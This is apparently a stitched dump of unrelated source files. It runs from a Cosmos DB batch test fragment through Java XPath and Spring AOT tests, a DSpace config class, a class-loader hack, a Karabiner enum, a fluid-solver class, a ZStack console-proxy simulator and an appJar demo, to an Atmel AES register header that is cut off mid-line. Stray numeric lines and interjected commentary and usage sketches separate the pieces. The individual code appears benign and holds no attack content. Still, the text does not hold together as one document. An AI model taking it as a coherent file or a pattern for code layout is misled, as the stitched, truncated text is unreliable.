(int i = 0; i < operationCount; i++) { JsonSerializable jsonSerializable = new JsonSerializable(); jsonSerializable.set("abc", StringUtils.repeat("x", docSizeInBytes - 10));// {"abc":" + "} = 10 ItemBulkOperation<?, ?> operation = new ItemBulkOperation<>( CosmosItemOperationType.CREATE, "", null, null, jsonSerializable, null ); operations.add(operation); } return PartitionKeyRangeServerBatchRequest.createBatchRequest( "0", operations, maxServerRequestBodyLength, maxServerRequestOperationCount); } }
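Outside the tests, the same split behaviour naturally drives a drain loop: keep creating server batch requests until nothing is pending. The sketch below is an illustration, not SDK code — it reuses the createBatchRequest signature and the getBatchRequest()/getBatchPendingOperations() accessors exercised above, assumes the pending list yields CosmosItemOperation instances (as the assertions suggest), and the 200_000-byte / 100-operation limits are arbitrary example values.

    // Sketch: split a flat list of operations into successive server batch requests.
    private static List<ServerOperationBatchRequest> drainIntoBatches(List<CosmosItemOperation> allOperations) {
        List<CosmosItemOperation> remaining = new ArrayList<>(allOperations);
        List<ServerOperationBatchRequest> batches = new ArrayList<>();
        while (!remaining.isEmpty()) {
            ServerOperationBatchRequest split = PartitionKeyRangeServerBatchRequest.createBatchRequest(
                "0", remaining, 200_000, 100);
            batches.add(split);
            // createBatchRequest accepts at least one operation per call (see the
            // "Setting max count to 0" test above), so the loop always makes progress.
            remaining = new ArrayList<>(split.getBatchPendingOperations());
        }
        return batches;
    }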
2,925
2,199
/******************************************************************************* * This Source Code Form is subject to the terms of the Mozilla Public * License, v. 2.0. If a copy of the MPL was not distributed with this * file, You can obtain one at http://mozilla.org/MPL/2.0/. ******************************************************************************/ package the8472.utils; import java.util.Iterator; import java.util.Map; import java.util.Objects; import javax.xml.XMLConstants; import javax.xml.namespace.NamespaceContext; import javax.xml.xpath.XPath; import javax.xml.xpath.XPathExpression; import javax.xml.xpath.XPathExpressionException; import javax.xml.xpath.XPathFactory; public class XMLUtils { public static XPathExpression buildXPath(String path) { return buildXPath(path, null); } public static XPathExpression buildXPath(String path, Map<String, String> map) { XPathFactory xPathfactory = XPathFactory.newInstance(); XPath xpath = xPathfactory.newXPath(); if(map != null) xpath.setNamespaceContext(new NamespaceContext() { public Iterator getPrefixes(String namespaceURI) { throw new UnsupportedOperationException(); } public String getPrefix(String namespaceURI) { throw new UnsupportedOperationException(); } public String getNamespaceURI(String prefix) { Objects.requireNonNull(prefix); if(map.containsKey(prefix)) return map.get(prefix); return XMLConstants.NULL_NS_URI; } }); try { return xpath.compile(path); } catch (XPathExpressionException e) { throw new RuntimeException(e); } } }
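A quick, hypothetical usage sketch for buildXPath with a namespace map; the XML document, the f prefix, and the urn:example:feed URI are invented for the example.

import java.io.StringReader;
import java.util.HashMap;
import java.util.Map;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.xpath.XPathExpression;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import the8472.utils.XMLUtils;

class XMLUtilsExample {
    public static void main(String[] args) throws Exception {
        // Made-up namespaced document for the example.
        String xml = "<feed xmlns=\"urn:example:feed\"><title>hello</title></feed>";

        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setNamespaceAware(true); // required so prefix-based XPath can see the namespace
        Document doc = dbf.newDocumentBuilder().parse(new InputSource(new StringReader(xml)));

        Map<String, String> ns = new HashMap<>();
        ns.put("f", "urn:example:feed"); // prefix only exists inside the XPath expression

        XPathExpression expr = XMLUtils.buildXPath("/f:feed/f:title", ns);
        System.out.println(expr.evaluate(doc)); // prints "hello"
    }
}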
537
1,702
/* * Copyright 2019-2021 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.springframework.aot.context.bootstrap.generator.infrastructure; import java.util.Arrays; import java.util.Collections; import org.junit.jupiter.api.Test; import org.springframework.aot.context.bootstrap.generator.infrastructure.ProtectedAccessAnalysis.ProtectedElement; import org.springframework.aot.context.bootstrap.generator.sample.visibility.ProtectedConstructorComponent; import org.springframework.aot.context.bootstrap.generator.sample.visibility.ProtectedFactoryMethod; import static org.assertj.core.api.Assertions.assertThat; import static org.assertj.core.api.Assertions.assertThatIllegalStateException; /** * Tests for {@link ProtectedAccessAnalysis}. * * @author <NAME> */ class ProtectedAccessAnalysisTests { @Test void isAccessibleWithPublicElements() { ProtectedAccessAnalysis analysis = new ProtectedAccessAnalysis(Collections.emptyList()); assertThat(analysis.isAccessible()).isTrue(); } @Test void isAccessibleWithProtectedElement() { ProtectedAccessAnalysis analysis = new ProtectedAccessAnalysis(Collections.singletonList( ProtectedElement.of(ProtectedConstructorComponent.class, null))); assertThat(analysis.isAccessible()).isFalse(); } @Test void getPrivilegedPackageNameWithPublicElements() { ProtectedAccessAnalysis analysis = new ProtectedAccessAnalysis(Collections.emptyList()); assertThat(analysis.getPrivilegedPackageName()).isNull(); } @Test void getPrivilegedPackageNameWithProtectedElement() { ProtectedAccessAnalysis analysis = new ProtectedAccessAnalysis(Collections.singletonList( ProtectedElement.of(ProtectedConstructorComponent.class, null))); assertThat(analysis.getPrivilegedPackageName()).isEqualTo(ProtectedConstructorComponent.class.getPackageName()); } @Test void getPrivilegedPackageNameWithProtectedElementsFromSamePackage() { ProtectedAccessAnalysis analysis = new ProtectedAccessAnalysis(Arrays.asList( ProtectedElement.of(ProtectedConstructorComponent.class, null), ProtectedElement.of(ProtectedFactoryMethod.class, null))); assertThat(analysis.getPrivilegedPackageName()).isEqualTo(ProtectedConstructorComponent.class.getPackageName()); } @Test void getPrivilegedPackageNameWithProtectedElementsFromDifferentPackages() { ProtectedAccessAnalysis analysis = new ProtectedAccessAnalysis(Arrays.asList( ProtectedElement.of(ProtectedConstructorComponent.class, null), ProtectedElement.of(String.class, null))); assertThatIllegalStateException().isThrownBy(analysis::getPrivilegedPackageName) .withMessageContaining(ProtectedConstructorComponent.class.getPackageName()) .withMessageContaining(String.class.getPackageName()); } }
948
541
/** * The contents of this file are subject to the license and copyright * detailed in the LICENSE and NOTICE files at the root of the source * tree and available online at * * http://www.dspace.org/license/ */ package org.dspace.xmlworkflow.state.actions; import org.dspace.xmlworkflow.state.actions.userassignment.UserSelectionAction; /** * A class containing the user selection action configuration * * @author <NAME> (bram.deschouwer at dot com) * @author <NAME> (kevin at atmire dot com) * @author <NAME> (ben at atmire dot com) * @author <NAME> (markd at atmire dot com) */ public class UserSelectionActionConfig extends WorkflowActionConfig { public UserSelectionActionConfig(String id) { super(id); } public void setProcessingAction(UserSelectionAction processingAction) { this.processingAction = processingAction; processingAction.setParent(this); } @Override public UserSelectionAction getProcessingAction() { return (UserSelectionAction) processingAction; } }
328
2,890
<filename>lts-core/src/main/java/com/github/ltsopensource/core/support/CrossClassLoader.java
package com.github.ltsopensource.core.support;

import com.github.ltsopensource.core.logger.Logger;
import com.github.ltsopensource.core.logger.LoggerFactory;

import java.lang.reflect.Field;
import java.util.Vector;

/**
 * Handles sharing classes across class loaders.
 *
 * @author <NAME> (<EMAIL>) on 6/25/16.
 */
public class CrossClassLoader {

    private static final Logger LOGGER = LoggerFactory.getLogger(CrossClassLoader.class);

    private static Field classes;
    private static final Object LOCK = new Object();

    static {
        try {
            classes = ClassLoader.class.getDeclaredField("classes");
            classes.setAccessible(true);
        } catch (Throwable e) {
            LOGGER.error("get ClassLoader 'classes' Field Error", e);
        }
    }

    @SuppressWarnings("unchecked")
    public static Class loadClass(String classname) throws ClassNotFoundException {

        if (classes == null) {
            return Thread.currentThread().getContextClassLoader().loadClass(classname);
        }

        try {
            synchronized (LOCK) {
                Vector v = (Vector) classes.get(CrossClassLoader.class.getClassLoader().getParent());
                for (int i = 0; i < v.size(); i++) {
                    Class o = (Class) v.get(i);
                    if (classname.equals(o.getName())) {
                        return o;
                    }
                }
                Class clazz = CrossClassLoader.class.getClassLoader().loadClass(classname);
                v.add(clazz);
                return clazz;
            }
        } catch (Exception e) {
            throw new ClassNotFoundException("load " + classname + " Error ", e);
        }
    }
}
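A hypothetical call site, for illustration only — com.example.SharedTask is a made-up class name, and the example assumes the loaded class has a no-arg constructor.

import com.github.ltsopensource.core.support.CrossClassLoader;

public class CrossClassLoaderExample {
    public static void main(String[] args) throws Exception {
        // First lookup loads the class and registers it in the parent loader's class vector.
        Class<?> shared = CrossClassLoader.loadClass("com.example.SharedTask");
        Object task = shared.getDeclaredConstructor().newInstance();

        // A later lookup (possibly from code running under another child class loader)
        // finds the registered entry and returns the same Class object.
        Class<?> again = CrossClassLoader.loadClass("com.example.SharedTask");
        System.out.println(shared == again); // expected: true
    }
}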
798
5,422
<filename>src/share/types/operation_type.hpp #pragma once #include <nlohmann/json.hpp> namespace krbn { enum class operation_type : uint8_t { none, // observer -> grabber momentary_switch_event_arrived, observed_devices_updated, caps_lock_state_changed, // session_monitor -> grabber console_user_id_changed, // console_user_server -> grabber connect_console_user_server, system_preferences_updated, frontmost_application_changed, input_source_changed, // any -> grabber set_variables, // grabber -> console_user_server shell_command_execution, select_input_source, software_function, end_, }; NLOHMANN_JSON_SERIALIZE_ENUM( operation_type, { {operation_type::none, nullptr}, {operation_type::momentary_switch_event_arrived, "momentary_switch_event_arrived"}, {operation_type::observed_devices_updated, "observed_devices_updated"}, {operation_type::caps_lock_state_changed, "caps_lock_state_changed"}, {operation_type::console_user_id_changed, "console_user_id_changed"}, {operation_type::connect_console_user_server, "connect_console_user_server"}, {operation_type::system_preferences_updated, "system_preferences_updated"}, {operation_type::frontmost_application_changed, "frontmost_application_changed"}, {operation_type::input_source_changed, "input_source_changed"}, {operation_type::set_variables, "set_variables"}, {operation_type::shell_command_execution, "shell_command_execution"}, {operation_type::select_input_source, "select_input_source"}, {operation_type::software_function, "software_function"}, {operation_type::end_, "end_"}, }); } // namespace krbn
634
1,355
// Copyright (c) 2018 <NAME> // // I am making my contributions/submissions to this project solely in my // personal capacity and am not conveying any rights to any intellectual // property of any third parties. #include <pch.h> #include <jet/grid_boundary_condition_solver2.h> using namespace jet; GridBoundaryConditionSolver2::GridBoundaryConditionSolver2() { } GridBoundaryConditionSolver2::~GridBoundaryConditionSolver2() { } const Collider2Ptr& GridBoundaryConditionSolver2::collider() const { return _collider; } void GridBoundaryConditionSolver2::updateCollider( const Collider2Ptr& newCollider, const Size2& gridSize, const Vector2D& gridSpacing, const Vector2D& gridOrigin) { _collider = newCollider; _gridSize = gridSize; _gridSpacing = gridSpacing; _gridOrigin = gridOrigin; onColliderUpdated(gridSize, gridSpacing, gridOrigin); } int GridBoundaryConditionSolver2::closedDomainBoundaryFlag() const { return _closedDomainBoundaryFlag; } void GridBoundaryConditionSolver2::setClosedDomainBoundaryFlag(int flag) { _closedDomainBoundaryFlag = flag; } const Size2& GridBoundaryConditionSolver2::gridSize() const { return _gridSize; } const Vector2D& GridBoundaryConditionSolver2::gridSpacing() const { return _gridSpacing; } const Vector2D& GridBoundaryConditionSolver2::gridOrigin() const { return _gridOrigin; }
457
879
package org.zstack.simulator.consoleproxy; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.http.HttpEntity; import org.springframework.stereotype.Controller; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.RequestMethod; import org.springframework.web.bind.annotation.ResponseBody; import org.zstack.core.thread.AsyncThread; import org.zstack.header.console.ConsoleConstants; import org.zstack.header.console.ConsoleProxyCommands; import org.zstack.header.console.ConsoleProxyCommands.DeleteProxyCmd; import org.zstack.header.console.ConsoleProxyCommands.DeleteProxyRsp; import org.zstack.header.exception.CloudRuntimeException; import org.zstack.header.rest.RESTFacade; import org.zstack.simulator.AsyncRESTReplyer; import org.zstack.utils.Utils; import org.zstack.utils.gson.JSONObjectUtil; import org.zstack.utils.logging.CLogger; import javax.servlet.http.HttpServletRequest; public class ConsoleProxySimulator { CLogger logger = Utils.getLogger(ConsoleProxySimulator.class); @Autowired private ConsoleProxySimulatorConfig config; @Autowired private RESTFacade restf; private AsyncRESTReplyer replyer = new AsyncRESTReplyer(); @RequestMapping(value= ConsoleConstants.CONSOLE_PROXY_PING_PATH, method= RequestMethod.POST) public @ResponseBody String ping(HttpEntity<String> entity) { ConsoleProxyCommands.PingCmd cmd = JSONObjectUtil.toObject(entity.getBody(), ConsoleProxyCommands.PingCmd.class); ConsoleProxyCommands.PingRsp rsp = new ConsoleProxyCommands.PingRsp(); if (!config.pingSuccess) { throw new CloudRuntimeException("on purpose"); } else { config.pingCmdList.add(cmd); } return JSONObjectUtil.toJsonString(rsp); } @AsyncThread private void doCheck(HttpEntity<String> entity) { ConsoleProxyCommands.CheckAvailabilityCmd cmd = JSONObjectUtil.toObject(entity.getBody(), ConsoleProxyCommands.CheckAvailabilityCmd.class); ConsoleProxyCommands.CheckAvailabilityRsp rsp = new ConsoleProxyCommands.CheckAvailabilityRsp(); if (!config.availableSuccess) { rsp.setSuccess(false); rsp.setError("Fail check on purpose"); } else { rsp.setAvailable(config.isAvailable); } replyer.reply(entity, rsp); } @RequestMapping(value= ConsoleConstants.CONSOLE_PROXY_CHECK_PROXY_PATH, method=RequestMethod.POST) public @ResponseBody String check(HttpServletRequest req) { HttpEntity<String> entity = restf.httpServletRequestToHttpEntity(req); doCheck(entity); return null; } @RequestMapping(value= ConsoleConstants.CONSOLE_PROXY_ESTABLISH_PROXY_PATH, method=RequestMethod.POST) public @ResponseBody String estabilish(HttpServletRequest req) { HttpEntity<String> entity = restf.httpServletRequestToHttpEntity(req); doEstabilish(entity); return null; } private void doEstabilish(HttpEntity<String> entity) { ConsoleProxyCommands.EstablishProxyCmd cmd = JSONObjectUtil.toObject(entity.getBody(), ConsoleProxyCommands.EstablishProxyCmd.class); ConsoleProxyCommands.EstablishProxyRsp rsp = new ConsoleProxyCommands.EstablishProxyRsp(); if (!config.proxySuccess) { rsp.setSuccess(false); rsp.setError("fail establishing proxy on purpose"); } else { rsp.setProxyPort(config.proxyPort); logger.debug(String.format("successfully establish console proxy %s at port %s", JSONObjectUtil.toJsonString(cmd), config.proxyPort)); } replyer.reply(entity, rsp); } @RequestMapping(value= ConsoleConstants.CONSOLE_PROXY_DELETE_PROXY_PATH, method=RequestMethod.POST) public @ResponseBody String delete(HttpServletRequest req) { HttpEntity<String> entity = 
restf.httpServletRequestToHttpEntity(req); delete(entity); return null; } private void delete(HttpEntity<String> entity) { DeleteProxyCmd cmd = JSONObjectUtil.toObject(entity.getBody(), DeleteProxyCmd.class); config.deleteProxyCmdList.add(cmd); DeleteProxyRsp rsp = new DeleteProxyRsp(); replyer.reply(entity, rsp); } }
1,594
633
<reponame>kuroyukihime0/ActSwitchAnimTool package yellow5a5.sample.ShareDemo; /** * Created by Yellow5A5 on 16/9/17. */ public interface IShare { void faceBookShareClick(); void twitterShareClick(); void googlePlusShareClick(); }
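Because the interface is only three click callbacks, an implementation can be a few lines; the class below is a hypothetical stand-in, assumed to sit next to IShare, that just prints which target was tapped.

public class LoggingShare implements IShare {

    @Override
    public void faceBookShareClick() {
        System.out.println("Facebook share clicked");
    }

    @Override
    public void twitterShareClick() {
        System.out.println("Twitter share clicked");
    }

    @Override
    public void googlePlusShareClick() {
        System.out.println("Google+ share clicked");
    }
}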
88
678
<reponame>bzxy/cydia<gh_stars>100-1000 /** * This header is generated by class-dump-z 0.2b. * * Source: /System/Library/PrivateFrameworks/GMM.framework/GMM */ #import <GMM/XXUnknownSuperclass.h> __attribute__((visibility("hidden"))) @interface GMMSetHttpCookieResponse : XXUnknownSuperclass { } - (void)writeTo:(id)to; // 0x1bcdd - (BOOL)readFrom:(id)from; // 0x1bc2d - (id)dictionaryRepresentation; // 0x1bc11 - (id)description; // 0x1bba1 - (void)dealloc; // 0x1bb75 @end
198
666
import sys sys.path.append("../../") from appJar import gui app=gui() app.addCheckBox("b1") app.addRadioButton("b1", "b1") app.addButton("BUTTON", None) app.setFg("pink") app.setBg("blue") app.go()
85
2,603
/* ---------------------------------------------------------------------------- */ /* Atmel Microcontroller Software Support */ /* SAM Software Package License */ /* ---------------------------------------------------------------------------- */ /* Copyright (c) 2014, Atmel Corporation */ /* */ /* All rights reserved. */ /* */ /* Redistribution and use in source and binary forms, with or without */ /* modification, are permitted provided that the following condition is met: */ /* */ /* - Redistributions of source code must retain the above copyright notice, */ /* this list of conditions and the disclaimer below. */ /* */ /* Atmel's name may not be used to endorse or promote products derived from */ /* this software without specific prior written permission. */ /* */ /* DISCLAIMER: THIS SOFTWARE IS PROVIDED BY ATMEL "AS IS" AND ANY EXPRESS OR */ /* IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF */ /* MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT ARE */ /* DISCLAIMED. IN NO EVENT SHALL ATMEL BE LIABLE FOR ANY DIRECT, INDIRECT, */ /* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT */ /* LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, */ /* OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF */ /* LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING */ /* NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, */ /* EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ /* ---------------------------------------------------------------------------- */ #ifndef _SAM_AES_COMPONENT_ #define _SAM_AES_COMPONENT_ /* ============================================================================= */ /** SOFTWARE API DEFINITION FOR Advanced Encryption Standard */ /* ============================================================================= */ /** \addtogroup SAM_AES Advanced Encryption Standard */ /*@{*/ #if !(defined(__ASSEMBLY__) || defined(__IAR_SYSTEMS_ASM__)) /** \brief Aes hardware registers */ typedef struct { __O uint32_t AES_CR; /**< \brief (Aes Offset: 0x00) Control Register */ __IO uint32_t AES_MR; /**< \brief (Aes Offset: 0x04) Mode Register */ __I uint32_t Reserved1[2]; __O uint32_t AES_IER; /**< \brief (Aes Offset: 0x10) Interrupt Enable Register */ __O uint32_t AES_IDR; /**< \brief (Aes Offset: 0x14) Interrupt Disable Register */ __I uint32_t AES_IMR; /**< \brief (Aes Offset: 0x18) Interrupt Mask Register */ __I uint32_t AES_ISR; /**< \brief (Aes Offset: 0x1C) Interrupt Status Register */ __O uint32_t AES_KEYWR[8]; /**< \brief (Aes Offset: 0x20) Key Word Register */ __O uint32_t AES_IDATAR[4]; /**< \brief (Aes Offset: 0x40) Input Data Register */ __I uint32_t AES_ODATAR[4]; /**< \brief (Aes Offset: 0x50) Output Data Register */ __O uint32_t AES_IVR[4]; /**< \brief (Aes Offset: 0x60) Initialization Vector Register */ __IO uint32_t AES_AADLENR; /**< \brief (Aes Offset: 0x70) Additional Authenticated Data Length Register */ __IO uint32_t AES_CLENR; /**< \brief (Aes Offset: 0x74) Plaintext/Ciphertext Length Register */ __IO uint32_t AES_GHASHR[4]; /**< \brief (Aes Offset: 0x78) GCM Intermediate Hash Word Register */ __I uint32_t AES_TAGR[4]; /**< \brief (Aes Offset: 0x88) GCM Authentication Tag Word Register */ __I uint32_t AES_CTRR; /**< \brief (Aes Offset: 0x98) GCM Encryption Counter Value Register */ __IO uint32_t AES_GCMHR[4]; /**< \brief (Aes Offset: 0x9C) GCM H World Register */ __I uint32_t Reserved2[20]; __I 
uint32_t AES_VERSION; /**< \brief (Aes Offset: 0xFC) Version Register */ } Aes; #endif /* !(defined(__ASSEMBLY__) || defined(__IAR_SYSTEMS_ASM__)) */ /* -------- AES_CR : (AES Offset: 0x00) Control Register -------- */ #define AES_CR_START (0x1u << 0) /**< \brief (AES_CR) Start Processing */ #define AES_CR_SWRST (0x1u << 8) /**< \brief (AES_CR) Software Reset */ /* -------- AES_MR : (AES Offset: 0x04) Mode Register -------- */ #define AES_MR_CIPHER (0x1u << 0) /**< \brief (AES_MR) Processing Mode */ #define AES_MR_GTAGEN (0x1u << 1) /**< \brief (AES_MR) GCM Automatic Tag Generation Enable */ #define AES_MR_DUALBUFF (0x1u << 3) /**< \brief (AES_MR) Dual Input Buffer */ #define AES_MR_DUALBUFF_INACTIVE (0x0u << 3) /**< \brief (AES_MR) AES_IDATARx cannot be written during processing of previous block. */ #define AES_MR_DUALBUFF_ACTIVE (0x1u << 3) /**< \brief (AES_MR) AES_IDATARx can be written during processing of previous block when SMOD = 0x2. It speeds up the overall runtime of large files. */ #define AES_MR_PROCDLY_Pos 4 #define AES_MR_PROCDLY_Msk (0xfu << AES_MR_PROCDLY_Pos) /**< \brief (AES_MR) Processing Delay */ #define AES_MR_PROCDLY(value) ((AES_MR_PROCDLY_Msk & ((value) << AES_MR_PROCDLY_Pos))) #define AES_MR_SMOD_Pos 8 #define AES_MR_SMOD_Msk (0x3u << AES_MR_SMOD_Pos) /**< \brief (AES_MR) Start Mode */ #define AES_MR_SMOD_MANUAL_START (0x0u << 8) /**< \brief (AES_MR) Manual Mode */ #define AES_MR_SMOD_AUTO_START (0x1u << 8) /**< \brief (AES_MR) Auto Mode */ #define AES_MR_SMOD_IDATAR0_START (0x2u << 8) /**< \brief (AES_MR) AES_IDATAR0 access only Auto Mode */ #define AES_MR_KEYSIZE_Pos 10 #define AES_MR_KEYSIZE_Msk (0x3u << AES_MR_KEYSIZE_Pos) /**< \brief (AES_MR) Key Size */ #define AES_MR_KEYSIZE_AES128 (0x0u << 10) /**< \brief (AES_MR) AES Key Size is 128 bits */ #define AES_MR_KEYSIZE_AES192 (0x1u << 10) /**< \brief (AES_MR) AES Key Size is 192 bits */ #define AES_MR_KEYSIZE_AES256 (0x2u << 10) /**< \brief (AES_MR) AES Key Size is 256 bits */ #define AES_MR_OPMOD_Pos 12 #define AES_MR_OPMOD_Msk (0x7u << AES_MR_OPMOD_Pos) /**< \brief (AES_MR) Operation Mode */ #define AES_MR_OPMOD_ECB (0x0u << 12) /**< \brief (AES_MR) ECB: Electronic Code Book mode */ #define AES_MR_OPMOD_CBC (0x1u << 12) /**< \brief (AES_MR) CBC: Cipher Block Chaining mode */ #define AES_MR_OPMOD_OFB (0x2u << 12) /**< \brief (AES_MR) OFB: Output Feedback mode */ #define AES_MR_OPMOD_CFB (0x3u << 12) /**< \brief (AES_MR) CFB: Cipher Feedback mode */ #define AES_MR_OPMOD_CTR (0x4u << 12) /**< \brief (AES_MR) CTR: Counter mode (16-bit internal counter) */ #define AES_MR_OPMOD_GCM (0x5u << 12) /**< \brief (AES_MR) GCM: Galois Counter mode */ #define AES_MR_LOD (0x1u << 15) /**< \brief (AES_MR) Last Output Data Mode */ #define AES_MR_CFBS_Pos 16 #define AES_MR_CFBS_Msk (0x7u << AES_MR_CFBS_Pos) /**< \brief (AES_MR) Cipher Feedback Data Size */ #define AES_MR_CFBS_SIZE_128BIT (0x0u << 16) /**< \brief (AES_MR) 128-bit */ #define AES_MR_CFBS_SIZE_64BIT (0x1u << 16) /**< \brief (AES_MR) 64-bit */ #define AES_MR_CFBS_SIZE_32BIT (0x2u << 16) /**< \brief (AES_MR) 32-bit */ #define AES_MR_CFBS_SIZE_16BIT (0x3u << 16) /**< \brief (AES_MR) 16-bit */ #define AES_MR_CFBS_SIZE_8BIT (0x4u << 16) /**< \brief (AES_MR) 8-bit */ #define AES_MR_CKEY_Pos 20 #define AES_MR_CKEY_Msk (0xfu << AES_MR_CKEY_Pos) /**< \brief (AES_MR) Key */ #define AES_MR_CKEY_PASSWD (0xEu << 20) /**< \brief (AES_MR) This field must be written with 0xE the first time that AES_MR is programmed. 
For subsequent programming of the AES_MR, any value can be written, including that of 0xE.Always reads as 0. */ /* -------- AES_IER : (AES Offset: 0x10) Interrupt Enable Register -------- */ #define AES_IER_DATRDY (0x1u << 0) /**< \brief (AES_IER) Data Ready Interrupt Enable */ #define AES_IER_URAD (0x1u << 8) /**< \brief (AES_IER) Unspecified Register Access Detection Interrupt Enable */ /* -------- AES_IDR : (AES Offset: 0x14) Interrupt Disable Register -------- */ #define AES_IDR_DATRDY (0x1u << 0) /**< \brief (AES_IDR) Data Ready Interrupt Disable */ #define AES_IDR_URAD (0x1u << 8) /**< \brief (AES_IDR) Unspecified Register Access Detection Interrupt Disable */ /* -------- AES_IMR : (AES Offset: 0x18) Interrupt Mask Register -------- */ #define AES_IMR_DATRDY (0x1u << 0) /**< \brief (AES_IMR) Data Ready Interrupt Mask */ #define AES_IMR_URAD (0x1u << 8) /**< \brief (AES_IMR) Unspecified Register Access Detection Interrupt Mask */ /* -------- AES_ISR : (AES Offset: 0x1C) Interrupt Status Register -------- */ #define AES_ISR_DATRDY (0x1u << 0) /**< \brief (AES_ISR) Data Ready */ #define AES_ISR_URAD (0x1u << 8) /**< \brief (AES_ISR) Unspecified Register Access Detection Status */ #define AES_ISR_URAT_Pos 12 #define AES_ISR_URAT_Msk (0xfu << AES_ISR_URAT_Pos) /**< \brief (AES_ISR) Unspecified Register Access: */ #define AES_ISR_URAT_IDR_WR_PROCESSING (0x0u << 12) /**< \brief (AES_ISR) Input Data Register written during the data processing when SMOD = 0x2 mode. */ #define AES_ISR_URAT_ODR_RD_PROCESSING (0x1u << 12) /**< \brief (AES_ISR) Output Data Register read during the data processing. */ #define AES_ISR_URAT_MR_WR_PROCESSING (0x2u << 12) /**< \brief (AES_ISR) Mode Register written during the data processing. */ #define AES_ISR_URAT_ODR_RD_SUBKGEN (0x3u << 12) /**< \brief (AES_ISR) Output Data Register read during the sub-keys generation. */ #define AES_ISR_URAT_MR_WR_SUBKGEN (0x4u << 12) /**< \brief (AES_ISR) Mode Register written during the sub-keys generation. */ #define AES_ISR_URAT_WOR_RD_ACCESS (0x5u << 12) /**< \brief (AES_ISR) Write-only register read access. 
*/ #define AES_ISR_TAGRDY (0x1u << 16) /**< \brief (AES_ISR) GCM Tag Ready */ /* -------- AES_KEYWR[8] : (AES Offset: 0x20) Key Word Register -------- */ #define AES_KEYWR_KEYW_Pos 0 #define AES_KEYWR_KEYW_Msk (0xffffffffu << AES_KEYWR_KEYW_Pos) /**< \brief (AES_KEYWR[8]) Key Word */ #define AES_KEYWR_KEYW(value) ((AES_KEYWR_KEYW_Msk & ((value) << AES_KEYWR_KEYW_Pos))) /* -------- AES_IDATAR[4] : (AES Offset: 0x40) Input Data Register -------- */ #define AES_IDATAR_IDATA_Pos 0 #define AES_IDATAR_IDATA_Msk (0xffffffffu << AES_IDATAR_IDATA_Pos) /**< \brief (AES_IDATAR[4]) Input Data Word */ #define AES_IDATAR_IDATA(value) ((AES_IDATAR_IDATA_Msk & ((value) << AES_IDATAR_IDATA_Pos))) /* -------- AES_ODATAR[4] : (AES Offset: 0x50) Output Data Register -------- */ #define AES_ODATAR_ODATA_Pos 0 #define AES_ODATAR_ODATA_Msk (0xffffffffu << AES_ODATAR_ODATA_Pos) /**< \brief (AES_ODATAR[4]) Output Data */ /* -------- AES_IVR[4] : (AES Offset: 0x60) Initialization Vector Register -------- */ #define AES_IVR_IV_Pos 0 #define AES_IVR_IV_Msk (0xffffffffu << AES_IVR_IV_Pos) /**< \brief (AES_IVR[4]) Initialization Vector */ #define AES_IVR_IV(value) ((AES_IVR_IV_Msk & ((value) << AES_IVR_IV_Pos))) /* -------- AES_AADLENR : (AES Offset: 0x70) Additional Authenticated Data Length Register -------- */ #define AES_AADLENR_AADLEN_Pos 0 #define AES_AADLENR_AADLEN_Msk (0xffffffffu << AES_AADLENR_AADLEN_Pos) /**< \brief (AES_AADLENR) AAD Length */ #define AES_AADLENR_AADLEN(value) ((AES_AADLENR_AADLEN_Msk & ((value) << AES_AADLENR_AADLEN_Pos))) /* -------- AES_CLENR : (AES Offset: 0x74) Plaintext/Ciphertext Length Register -------- */ #define AES_CLENR_CLEN_Pos 0 #define AES_CLENR_CLEN_Msk (0xffffffffu << AES_CLENR_CLEN_Pos) /**< \brief (AES_CLENR) Plaintext/Ciphertext Length */ #define AES_CLENR_CLEN(value) ((AES_CLENR_CLEN_Msk & ((value) << AES_CLENR_CLEN_Pos))) /* -------- AES_GHASHR[4] : (AES Offset: 0x78) GCM Intermediate Hash Word Register -------- */ #define AES_GHASHR_GHASH_Pos 0 #define AES_GHASHR_GHASH_Msk (0xffffffffu << AES_GHASHR_GHASH_Pos) /**< \brief (AES_GHASHR[4]) Intermediate GCM Hash Word x */ #define AES_GHASHR_GHASH(value) ((AES_GHASHR_GHASH_Msk & ((value) << AES_GHASHR_GHASH_Pos))) /* -------- AES_TAGR[4] : (AES Offset: 0x88) GCM Authentication Tag Word Register -------- */ #define AES_TAGR_TAG_Pos 0 #define AES_TAGR_TAG_Msk (0xffffffffu << AES_TAGR_TAG_Pos) /**< \brief (AES_TAGR[4]) GCM Authentication Tag x */ /* -------- AES_CTRR : (AES Offset: 0x98) GCM Encryption Counter Value Register -------- */ #define AES_CTRR_CTR_Pos 0 #define AES_CTRR_CTR_Msk (0xffffffffu << AES_CTRR_CTR_Pos) /**< \brief (AES_CTRR) GCM Encryption Counter */ /* -------- AES_GCMHR[4] : (AES Offset: 0x9C) GCM H World Register -------- */ #define AES_GCMHR_H_Pos 0 #define AES_GCMHR_H_Msk (0xffffffffu << AES_GCMHR_H_Pos) /**< \brief (AES_GCMHR[4]) GCM H word x */ #define AES_GCMHR_H(value) ((AES_GCMHR_H_Msk & ((value) << AES_GCMHR_H_Pos))) /* -------- AES_VERSION : (AES Offset: 0xFC) Version Register -------- */ #define AES_VERSION_VERSION_Pos 0 #define AES_VERSION_VERSION_Msk (0xfffu << AES_VERSION_VERSION_Pos) /**< 